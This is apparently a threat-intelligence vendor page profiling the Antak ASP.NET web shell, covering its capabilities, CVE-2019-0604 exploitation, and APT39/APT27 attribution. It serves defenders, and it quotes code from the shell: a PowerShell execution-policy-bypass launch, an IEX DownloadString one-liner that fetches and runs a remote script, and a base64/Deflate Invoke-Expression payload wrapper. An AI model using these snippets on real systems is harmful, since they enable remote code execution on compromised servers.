Antak is an ASP.NET web shell in the Nishang offensive framework that provides remote post-exploitation access to compromised Microsoft IIS servers through a browser-based interface. Implemented as a server-side ASPX page, it authenticates operators through a login form and then executes PowerShell on the host, typically invoking it in non-interactive mode with execution-policy bypass. Its core functionality includes remote command execution, encoded PowerShell payload execution, file upload and download, extraction of application and database configuration data from web.config files, and execution of SQL queries against accessible SQL Server instances using recovered connection information. Antak is designed to support hands-on-keyboard activity after server compromise, enabling operators to harvest configuration secrets, interact with local files, and pivot into backend databases.
Antak has been observed deployed as a web shell following exploitation of vulnerable internet-facing applications, including SharePoint servers compromised via CVE-2019-0604. It has been associated with state-linked intrusion activity, including operations attributed to APT39 and reporting on APT27 intrusions involving installation of multiple web shells on compromised web infrastructure. In these contexts, Antak functions as a persistence and command-execution mechanism on targeted web servers rather than as an initial-access payload by itself. Its use is consistent with espionage-oriented intrusions against government and enterprise environments where attackers seek durable access to Windows-based web servers and connected data stores.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Initial access was believed to be via CVE-2019-0604, after which the actors planted multiple web shells — Antak v0.5.0 (error2.aspx) and China Chopper–style one-liners.
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Initial access was believed to be via CVE-2019-0604, after which the actors planted multiple web shells — Antak v0.5.0 (error2.aspx) and China Chopper–style one-liners.
...exploited vulnerable web servers of targeted organizations to install web shells, such as ANTAK and ASPXSPY...
10 distinct techniques documented for this family, organized by ATT&CK tactic.
psi.FileName = "powershell.exe"; psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg; | Use powershell one-liner (example below) for download & execute in the command box. IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]
Paste the script in command textbox and click 'Encode and Execute'.
string code = Convert.ToBase64String(ms.ToArray()); string command = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('" + code + "')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();";
1 indicator attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Web shell deployed by APT27 after SharePoint exploitation to maintain foothold and support post-exploitation.
Web shell used to maintain access on compromised servers.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.